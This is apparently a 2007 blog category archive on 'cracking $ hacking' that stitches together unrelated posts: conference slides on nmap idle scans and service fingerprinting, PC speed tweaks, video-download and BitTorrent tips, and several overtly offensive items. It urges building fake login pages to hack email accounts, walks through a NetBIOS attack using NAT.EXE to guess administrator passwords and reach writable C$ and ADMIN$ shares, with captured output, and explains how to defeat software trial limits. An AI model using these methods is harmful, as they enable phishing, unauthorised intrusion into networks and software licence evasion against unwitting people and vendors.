Advanced Scanning
– IP-ID Idle Scan –
Step 1: A) send SYN/ACK to Zombie
B) investigate the answer IPID
C) repeate A) and B) multiple times, verify quality of Zombie
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=3
IP-ID Probe -> SYN/ACK Zombie
Response -> RST; IPID=4
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=5
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=2
01./02.02.2007 linuxdays.lu 2007 31
Advanced Scanning
– IP-ID Idle Scan –
Step 2: A) Send SYN to target BUT spoof the Source IP Adress,
claim to be the Zombie
B) open port: Target send SYN/ACK to Zombie
C) open port: Zombie send RST and increase IPID to Target
SYN;
Port=80;
SRC IP = <zombie>
SYN/ACK
Zombie
Target
RST; IPID=6
01./02.02.2007 linuxdays.lu 2007 32
Advanced Scanning
– IP-ID Idle Scan –
Step 2: A) Send SYN to target BUT spoof the Source IP Adress,
claim to be the Zombie
B) close port: Target simply send a RST to the Zombie
SYN;
Port=80;
SRC IP = <zombie>
RST
Zombie
Target
01./02.02.2007 linuxdays.lu 2007 33
Advanced Scanning
– IP-ID Idle Scan –
Step 3: A) send SYN/ACK to Zombie
B) investigate the answer IPID
If IPID = 6 à port was close
If IPID = 7 à port was open
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=7
Zombie
01./02.02.2007 linuxdays.lu 2007 34
Advanced Scanning
– IP-ID Idle Scan –
IP ID Idle Scan with nmap
# nmap –n –P0 –p20-25,80,443 –sI <zombie> <target>
# nmap –n –P0 –p20-25,80,443 –sI 10.10.10.10 10.10.11.11
01./02.02.2007 linuxdays.lu 2007 35
Scanning
– Identifying Services –
Banner Grabbing & Version Mapping:
- What services are bound to the port:
– identifying service / protocoll;
– identifying Server-Software;
– identifying Version Number;
– identifying additional Modules etc.
automatic approach
# nmap –n –p 20-25,80,443 –sV 192.168.22.22,25
# nmap –n –p 20-25,80,443 –oM scan1 192.168.22.22,25
# amap –B –i scan1
# amap –i scan1
01./02.02.2007 linuxdays.lu 2007 36
Scanning
– Identifying Services –
Banner Grabbing & Version Mapping:
manual approach with Netcat
# nc 192.168.22.22 22
# nc 192.168.22.22 80
HEAD / HTTP/1.0
# nc 192.168.22.21 21
# nc 192.168.22.21 80
HEAD / HTTP/1.0
OS Detection
# nmap –O 192.168.22.22,25
# xprobe2 192.168.22.22
# xprobe2 –p tcp:443:open 192.168.22.22
01./02.02.2007 linuxdays.lu 2007 37
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 38
Gaining Access
– Where are we now –
At this point we know (without doing something illegal at all):
– Targets business (products, partners, emplyees)
– overview of the network topology
– overview of live servers and open ports
– services in use, server-software, version numbers
How to proceed:
– is there a known vulnerability
– do we know a vulnerability
– known configuration problems
– default passwords
prepare attack
– research on internet for known security holes
– default passwords; common misconfigurations
– setup a test environment to practice the attack
– ideal: fire one single attack
01./02.02.2007 linuxdays.lu 2007 39
Gaining Access
– prepare attack –
01./02.02.2007 linuxdays.lu 2007 40
Gaining Access
– prepare attack –
01./02.02.2007 linuxdays.lu 2007 41
Gaining Access
– prepare attack –
01./02.02.2007 linuxdays.lu 2007 42
Gaining Access
– prepare attack –

Go to >>>>>2

Posted in All about cracking $ hacking, All tips and tricks | Leave a Comment »

Top 20 Tips To Keep Your System Faster

December 7, 2007

Follow these tips and you will definitely have a much faster and more reliable PC! Most of the below tips works for windows 98 1. Wallpapers: They slow your whole system down, so if you're willing to compromise, have a basic plain one instead!
2. Drivers: Update your hardware drivers as frequently as possible. New drivers tend to increase system speed especially in the case of graphics cards, their drivers are updated by the manufacturer very frequently! 3. Minimizing: If you want to use several programs at the same time then minimize those you are not using. This helps reduce the overload on RAM.
4. Boot Faster: The 'starting Windows 95/98' message on startup can delay your booting for a couple of seconds. To get rid of this message go to c:\ and find the file Msdos.sys. Remove the Read-Only option. Next, open it in Notepad or any other text editor. Finally, go to the text 'Options' within the file and make the following changes: Add BootDelay=0. To make your booting even faster, set add Logo=0 to remove the Windows logo at startup. 5. Restart only Windows: When restarting your PC, hold down Shift to only restart Windows rather than the whole system which will only take a fraction of the time. 6. Turn Off Animations: Go to Display Settings from the Control Panel and switch to the Effects Tab. Now turn off Show Windows Content While Dragging and Smooth Edges on Screen Fonts. This tip is also helpful with Windows XP because of the various fade/scroll effects. 7. Faster Start-Menu Access: Go to the Start menu and select Run. Now type Regedit and hit Enter. The Registry Editor will appear on the screen. Now, open the folder HKEY_CURRENT_USER\Control Panel\Desktop. You should see a MenuShowDelay value. If you don't then do the following: right click on a blank space in the right pane and select New\String. Change the name in the new value to MenuShowDelay. Now that we have the MenuShowDelay value, double click on it and enter 0 in the value data field. This sets the start menu delay to 0 milliseconds.
8. Resolutions: If you are willing to do anything for faster performance from your PC, then try lowering your display resolution. The lower it is, the faster your PC. 9. Turn off Active Desktop: Go to your Display Properties and switch to the Web tab. Uncheck View My Active Desktop As a Web Page. Since the Active Desktop option under Windows 98 uses a lot of system resources, this option can have a dramatic effect on the speed of the whole system. 10. Defragment Often: Windows 98's Defrag tool uses Application Acceleration from Intel which means that when you defragment your drive, data is physically arranged on the drive so that applications will load faster. 11. Take your PC to Bed: Using the Advanced Power Management feature under Windows 98 gives you the option to use the sleep command. That way, you can send your PC to sleep instead of shutting it down and then restarting it. It's as simple as pressing a button and then pressing the same button to wake it up. You can tell Windows after how many minutes/hours of inactivity to automatically sleep the machine in the Advanced Power Management section of the Control Panel. 12. Faster Internet Access: If you use the internet for reference and the sites you visit are rarely updated then try the following. In IE (the same can be done in Netscape) go to Tools, Internet Options. Next, click on Settings… in the Temporary Internet Files section. Finally, select Never for the first option and double the amount of storage space to use, click OK! 13. Benchmarking: Benchmarking can be very useful when run frequently. It can tell you how your PC's components are performing and then compare them to other machines like yours. For example, when you overclock your PC, you want to know how much more speed you have and whether it is stable. All this and more can be discovered using benchmarking. An excellent piece of software for doing this job is SiSoft Sandra which can be found in the Downloads File Archive!
14. Refresh the Taskbar without restarting: If you in some way change the taskbar, either in Regedit or elsewhere, you can refresh the task bar without restarting. Hold down Ctrl Alt Del, and double click on Explorer. Say Yes to close Explorer, but no to closing Windows. This will refresh the Taskbar and system tray. 15. Quick CD Eject: Instead of pushing the button on your drive, right-click your CD drive letter in My Computer and click on Eject. This will also remove any icons that have become associated with the CD drive. 16. Start Up Programs: Windows can be slowed down when programs run on start up. To eliminate this, check your Start up folder. You can access it from the start menu: Start, Programs, Start Up. Another way to eliminate programs from loading even before Windows actually starts is by doing the following: Click on Start, then Run. Type msconfig. It will take quite a long time for this program to load, but when you finally see it on your screen, explore the different tabs. They all have to do with how quickly your PC boots, so select what you want, and uncheck what you don't want! 17. Fonts: When Windows starts, it loads every single font in the Fonts folder. Therefore, the more fonts you have, the slower the booting process. To get rid of unwanted fonts, simply go to the Fonts folder under c:\windows and remove whatever you don't want. Fonts that have a red letter 'A' as their icon are system fonts, so don't delete them. 18. Stretching Wallpapers: Don't "stretch" your wallpaper in Windows 98 since it actually slows Windows down when you drag icons around on the desktop. 19. RAM Matters: If you have less than 32MB then you should seriously think of upgrading it to at least 64MB. Windows runs much more smoothly with 64MB or higher and tends to use less hard disk space for virtual memory. 20. Partitioning: A very nice little thing you can do to boost system performance. By partitioning your hard drive, splitting one physical drive into several logical ones, you can gain several advantages. 1. If you get a virus or you accidentally format a drive, not all will be lost. 2. By placing the swap file (Win386.swp) on a separate drive, The swap file will be less fragmented and thus, faster. 3. Place Windows on a separate drive and whenever you need to reinstall it, you rest assured that your data is safe on a separate drive. Partitioning can be done using a few programs such as FDisk which comes with DOS. However, FDisk formats everything on the hard disk before partitioning. Alternatively, you can use Partition Magic from Power Quest to partition your hard disk without losing your data.

Posted in All about cracking $ hacking, All about windows, All about windows cheating, All tips and tricks, All tips and tricks Xp | Leave a Comment »

You tube and Google video Hacks

December 7, 2007

As we all know that none of the video sharing sites provide a link to download their videos. So we will have to do some tweaking and play around to download the videos. Here are some ways to download any video from the internet , they are based on the common hack (Right-click -> "Save Target As" OR copy the link into your download manager, but change the file extension to .flv)

Method 1: For Firefox Users – Install the VideoDownloader Extension from Mozilla Add-ons website – It downloads all embedded objects on a webpage including the video clips. This is very easy for beginners.
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
Method 2: One of the easiest ways is to copy your video URL and paste it on KeepVid Lite. When you click submit, you will be provided with a link to save the video as an FLV file. Using these tricks you can easily download videos from Youtube or Google Videos or Metacafe.
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
Now some more questions that arise are:
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
How do I play FLV files on my computer – They dont open with windows media player or winamp or itunes or real player ?
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
You can download free FLV players to watch FLV files locally. A good FLV player has a simple and easy-to-remember name – FLV Player. Another nice alternative is the Riva FLV player.Try them out.
How do I split a large FLV file into smaller playable video clips?
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
This is the most common question among video enthusiasts – they want to split a large FLV video file into smaller chunks for editing or resharing only the interesting tidbits on the internet. To break an FLV file, get the free FLV Parser – a tiny command-line tool to split FLVs into pieces. Its intended use is to convert a large FLV into a series of shorter FLVs based on a series of millisecond-based timecodes. Using the -s switch will split the audio and video of the outputted files; the audio track will be extracted as a series of MP3 files, and the short FLVs produced will have no audio track at all.
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
How to convert FLV videos to Windows AVI or Quicktime MOV or 3GP formats ?
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
The free Simplified Universal Player Encoder & Renderer software from Super can convert FLV files to practically any other video format including MP4, MOV H.264, AVI, ASF or Flash SWF animations. Super video convertor
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
How do I convert my AVI, MPEG, MOV, 3GP movie clips back to FLV format ?
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
Say you complete editing your movie in Windows Movie Maker or Avid and now left with an MOV file that you want to convert to FLV. Just get the free Riva FLV encoder and relax. The Riva encoder even lets you select parts of the video that you want to convert to FLV and crop the rest.
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video. I have three small video clips that I download from Google Videos and now want to join them into one single video -How do I merge FLV files ? There is no free software that lets you join FLV files other than the expensive Macromedia Flash Professional. However, here's a simple trick to join several flv video files – convert individual flv files to avi using Super [as mentioned above], then join the multiple Avi files into a single avi file using free VirtualDub and finally convert this avi back to FLV using Riva FLV encoder.Its done.
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
How do I watch Youtube Video on my iPod, PSP or Television ?
Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.
Again we'll make use of the Super Video Encoder mentioned above. Just convert the FLV file into a corresponding format (like Apple iPod or Sony PSP or MPG) and transfer it to your gadget Youtube Links, Download, google video Links, Youtube songs, google Video songs, download from Youtube & google Video.

Posted in All about cracking $ hacking, All tips and tricks, google | Leave a Comment »

Top Tips to increase bittorent download Speed

December 7, 2007

The latest file sharing protocol bittorrent has modified everything when it comes to file sharing. It is a nice platform for downloading large files. Sharing of files include movies, iso images and MP3 songs. Bittorent is mainly famous for illegal file sharing .
The Bittorrent system can be slow at times due to heavy traffic. so let us tweak bittorrent sharing program a little bit.
There are a lot of different bittorrent clients that you can download. I think the best are BitCommet and uTorrent. Here is a few tips to speed up uTorrent Client. Similar can be implemented on any other torrent clients ,which you are using.
Step 1: Increase TCP connections You need to increase the number of TCP connections that are allowed at max.Windows XP Service Pack 2 came with the number of allowed open connections to 10. This is to stop any piece of spyware(in our case bittorent client even) from totally taking over your internet connection. TCP connection allowed should be 50 for optimal performance. The best way to increase the maximum number of connections is to apply patch that is available at www.lvllord.de. A nice way to fix this is to download this patch . The little tweak to the torrent client works great in certain times. If you’re using uTorrent go to Options menu then Preferences. In the Preferences go the Advanced Options. In the advanced options change the net.max_halfopen connections to 80. In the same section change the max half open tcp connections to 80. Once your done click on OK and you are all set. This tweak will let the maximum TCP connection available for the bittorrent client. Now start downloading you’ll realize a little difference in the download speed. Port forwarding technique is more effective than this.
A third point of interest is that some “windows updates” revert your tweaked tcp connections back to 10. So it’s wise to check this every now and then. You can check this by going to (in windows xp) Start > Control Panel > Administrative Tools > Event Viewer > System… Look for event 4226 (sort by event).
If there are a lot of daily occurences it’s likely that the max amount of half-open tcp connections was set back to 10. Or you’re infected with some nasty spyware… Step 2:Torrent Client Configuration
In order to apply these tips you must know your maximum up- and download speed. You can test your bandwidth over here (stop all download activity while testing). Settings 1-4 can be found in the options, settings or preference tab of most torrent clients. 1. Maximum upload speedProbably the most important setting there is. Your connection is (sort of) like a pipeline, if you use you maximum upload speed there’s not enough space left for the files you are downloading. So you have to cap your upload speed. Use the following formula to determine your optimal upload speed… 80% of your maximum upload speed so if your maximum upload speed is 40 kB/s, the optimal upload rate is 32kB/s But keep seeding!

Posted in All about cracking $ hacking, All about windows, All tips and tricks Xp | Leave a Comment »

Build Fake Login Pages

December 7, 2007

Fake Login Pages are one of the BEST method to Hack an Email account.

Now it's easy to build a Fake Login Pages without any knowledge of Programming Languages. One can use http://www.jotform.com to build the Sign Up page.

Rest of the things required to build a Fake Login Page are easy to learn.

Example of a Fake Login Page is displayed below.

http://216.219.88.102/demo_fakeloginpage.html

Don't forget to decorate your fake login page to express the delusion.

If you want to host your page on a free server, then below is the link to Free Hosting Providers.

Free Hosting Provider

Posted in All about cracking $ hacking | Leave a Comment »

Enable Right Clicks on The Sites That Disable it

December 7, 2007

Enable Right Clicks on The Sites Dat Disable it

Lots of web sites have disabled the right click function of the mouse button… it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done… 'cause generally the javascript enhances a website.

Change Yahoo messenger title bar

Hey guys you can change the yahoo messenger title bar…
For this just find the folder messenger in the drive in which the messenger is installed. Then search a file named "ymsgr". In this file just go to the end and write the following code:
[APP TITLE]
CAPTION=Red Devil
Here you can write any name in place of Red Devil… then see the fun…. You can have your own name being placed in yahoo messenger title bar.

lots more to come
share what u have
keep posting

Posted in All about cracking $ hacking | Leave a Comment »

NetBios Hacking

December 7, 2007

Topic [8.0.0] Internal reference

u may ask any doubts refer to the section number.

So wid the previous section u are well versed with NetBIOS now lets see a hackers approach n and how easy is for u to be a victim.

This is for an Educational purpose only

NetBIOS Attack Methods

This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

Switches:

-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.
<address>
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname – "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.

[8.0.1] Comparing NAT.EXE to Microsoft's own executables

[8.0.2] First, a look at NBTSTAT

First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.

What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.

C:\nbtstat -A XXX.XX.XXX.XX

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial NetBIOS 16th bit listing:

Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name

Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
<BF> Network Monitor Name
<BE> Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client

[8.0.3] Intro to the NET commands

The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:

[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.

[8.0.5] Net Computer: This adds or deletes computers from a domains database.

[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.

[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.

[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.

[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.

[8.1.0] Net Help: Help with these commands

[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.

[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.

[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.

[8.1.4] Net Pause: Use this command to suspend a certain NT service.

[8.1.5] Net Print: Displays print jobs and shared queues.

[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.

[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.

[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.

[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.

[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.

[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.

[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.

[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.

[8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers.

[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:

Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View

For this section, the command being used is the NET VIEW and NET USE commands.

[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.

C:\net view XXX.XX.XXX.XX

Shared resources at XXX.XX.XXX.XX

Share name Type Used as Comment

——————————————————————————
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.

NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.

C:\net use /?

The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

C:\net use x: \\XXX.XX.XXX.XX\test

The command completed successfully.

C:\unzipped\nat10bin>net use

New connections will be remembered.

Status Local Remote Network

——————————————————————————-
OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network

The command completed successfully.

Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.

C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY

[*]— Reading usernames from userlist.txt
[*]— Reading passwords from passlist.txt

[*]— Checking host: XXX.XX.XXX.XX
[*]— Obtaining list of remote NetBIOS names

[*]— Attempting to connect with name: *
[*]— Unable to connect

[*]— Attempting to connect with name: *SMBSERVER
[*]— CONNECTED with name: *SMBSERVER
[*]— Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]— Server time is Mon Dec 01 07:44:34 1997
[*]— Timezone is UTC-6.0
[*]— Remote server wants us to encrypt, telling it not to

[*]— Attempting to connect with name: *SMBSERVER
[*]— CONNECTED with name: *SMBSERVER
[*]— Attempting to establish session
[*]— Was not able to establish session with no password
[*]— Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]— CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]— Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]— Obtained listing of shares:

Sharename Type Comment
——— —- ——-
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:

[*]— This machine has a browse list:

Server Comment
——— ——-
STUDENT1

[*]— Attempting to access share: \\*SMBSERVER\
[*]— Unable to access

[*]— Attempting to access share: \\*SMBSERVER\ADMIN$
[*]— WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]— Checking write access in: \\*SMBSERVER\ADMIN$
[*]— WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]— Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$

[*]— Attempting to access share: \\*SMBSERVER\C$
[*]— WARNING: Able to access share: \\*SMBSERVER\C$
[*]— Checking write access in: \\*SMBSERVER\C$
[*]— WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]— Attempting to exercise .. bug on: \\*SMBSERVER\C$

[*]— Attempting to access share: \\*SMBSERVER\NETLOGON
[*]— WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]— Checking write access in: \\*SMBSERVER\NETLOGON
[*]— Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]— Attempting to access share: \\*SMBSERVER\Test
[*]— WARNING: Able to access share: \\*SMBSERVER\Test
[*]— Checking write access in: \\*SMBSERVER\Test
[*]— Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]— Attempting to access share: \\*SMBSERVER\D$
[*]— Unable to access

[*]— Attempting to access share: \\*SMBSERVER\ROOT
[*]— Unable to access

[*]— Attempting to access share: \\*SMBSERVER\WINNT$
[*]— Unable to access

If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.

Posted in All about cracking $ hacking | Leave a Comment »

How to Extend Time Limits on Free trial Softwares

December 7, 2007

>^Check our Site Contents

How would you like to be able to download software intended to be used on a free trial basis and use it indefinitely without cost never to expire? Well, there is a way you can take any free trial download and use it free for as long as you please. System Mechanic 6 Pro 30 day free trial then 69.95
Get it Free forever Kaspersky Anti-Hacker
Get it Free with System Mechanic Pro
Smart Protector Pro 15 day free trial then 39.90
Get It Free forever All you have to do is set your clock to some date in the distant future using adjust/date/time in Windows, download your free trial software, run the program once and rollback your time setting to the current date. After you’ve run the program for the first time, the Windows registry will be loaded with a Free Trial Key reflecting an expiration date that you’ve predetermined, and your good to go. Another roundabout way to do this after a trial has already expired would be to bring up the Registry Editor in Windows, find the trial key and delete it. Then download the program again and start the free trial period over. This is pretty easy to do, but if you’re using alot of free trials you may find it to be a hassle editing registers and downloading programs over again everytime one expires. Its much easier to simply adjust your date/time to 2009 or something, download your free trials, rollback to the current date and enjoy them for the next 3 years or so hassle free. By the way I’ve found that when doing this I’m still able to get the notifications when updated versions come along, and download them with no problem. The above screenshots are just 3 examples of the many programs that I’ve been doing this with for an extended time. If your the geek type, manipulating the dates in the registers will also work. Do some experimenting and see what you can find, there are tons of possibilities, and this is something you can have alot of fun with.

Posted in All about cracking $ hacking | Leave a Comment »

Kareninaworld’s Blog

Archive for the ‘All about cracking $ hacking’ Category

Default passwords

well i Hope u ll figure out How to use it

Hacking Techniques page 2

Hacking Techniques

Top 20 Tips To Keep Your System Faster

You tube and Google video Hacks

Top Tips to increase bittorent download Speed

Build Fake Login Pages

Enable Right Clicks on The Sites That Disable it

Enable Right Clicks on The Sites Dat Disable it

Change Yahoo messenger title bar

NetBios Hacking

Topic [8.0.0] Internal reference

So wid the previous section u are well versed with NetBIOS now lets see a hackers approach n and how easy is for u to be a victim.

This is for an Educational purpose only

NetBIOS Attack Methods

How to Extend Time Limits on Free trial Softwares

Pages

Archives

Categories

Follow “Kareninaworld's Blog”